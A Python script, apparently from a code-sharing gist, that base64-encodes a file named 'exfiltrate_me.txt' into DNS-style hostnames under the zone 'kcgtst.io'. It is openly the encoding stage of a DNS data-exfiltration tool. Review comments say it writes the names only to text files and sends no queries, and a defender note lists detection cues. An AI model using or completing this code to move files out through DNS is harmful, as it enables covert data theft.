Created
May 10, 2022 12:48
| import socket | |
| import base64 | |
| import struct | |
| import time | |
| import binascii | |
""" Break a large file into small 96 byte chunks
Sequence the chunks, pack and b64 encode them
Then send DNS queries """
# NOTE(review): the description above does not match the code in this listing:
# break_file reads 45-byte chunks, adds no sequence numbers, and only writes
# the encoded names to dns_requests<N>.txt. Nothing here issues a DNS query.
# If you don't like non-valid characters in the hostname,
# then use hex encoding rather than base64
# (base64 output can contain '+', '/' and '=', which fall outside the
# letter-digit-hyphen hostname character set.)
# Suffix appended to every encoded name that break_file writes.
DNS_ZONE = "kcgtst.io"
# Number of passes the run loop makes over the input file. The loop is
# sequential; no threads are started in this listing. Each pass skips a
# different number of leading bytes, presumably so the encoded output differs
# from pass to pass.
NUMBER_OF_THREADS = 4
# Number of encoded chunks (labels) joined into one output line.
MAX_PART_INDEX = 4
# Default timeout, in seconds, for sockets created after this call; no socket
# is created in the code shown here.
socket.setdefaulttimeout(1)
def break_file(read_filename, file_index):
    """Encode a file as base64 labels under DNS_ZONE and write them to a text file.

    The first ``file_index`` bytes of ``read_filename`` are read and discarded;
    they never appear in the output. The remainder is read in 45-byte chunks,
    each chunk is base64-encoded (60 characters for a full chunk) and followed
    by a dot. Every ``MAX_PART_INDEX`` chunks are joined, suffixed with
    ``DNS_ZONE`` and written as one line of ``dns_requests{file_index}.txt``.
    At end of file the pending labels (possibly none) are written the same way.

    This function performs no DNS lookup; it only produces the text file.

    Defender note: the generated names consist of long base64 labels, which
    may contain '+', '/' and '=', all ending in the same zone suffix. Label
    length, character set and a shared parent zone are properties DNS
    monitoring can key on.

    Args:
        read_filename: Path of the input file, opened in binary mode.
        file_index: Number of leading bytes to skip; also used in the output
            file name.

    Returns:
        None. Any exception is caught and printed rather than propagated.
    """
    try:
        with open(read_filename, "rb") as src, \
                open(f"dns_requests{file_index}.txt", "w") as sink:
            # Skip the leading bytes; the value read is intentionally unused.
            src.read(file_index)
            pending_labels = []
            chunks_seen = 0
            while True:
                chunk = src.read(45)
                chunks_seen += 1
                if not chunk:
                    # End of input: flush whatever labels are still pending.
                    print(f"Encoding dns requests completed for part {file_index}")
                    sink.write("".join(pending_labels) + DNS_ZONE + '\n')
                    break
                encoded = binascii.b2a_base64(chunk, newline=False)
                pending_labels.append(encoded.decode() + ".")
                if chunks_seen == MAX_PART_INDEX:
                    # A full line's worth of labels has accumulated.
                    sink.write("".join(pending_labels) + DNS_ZONE + '\n')
                    chunks_seen = 0
                    pending_labels = []
    except Exception as e:
        print(e)
# Run Program
# Calls break_file once per index, one after another (no threads are started).
# Each call reads the same input file and writes its own dns_requests<idx>.txt.
for idx in range(NUMBER_OF_THREADS):
    break_file('exfiltrate_me.txt', idx)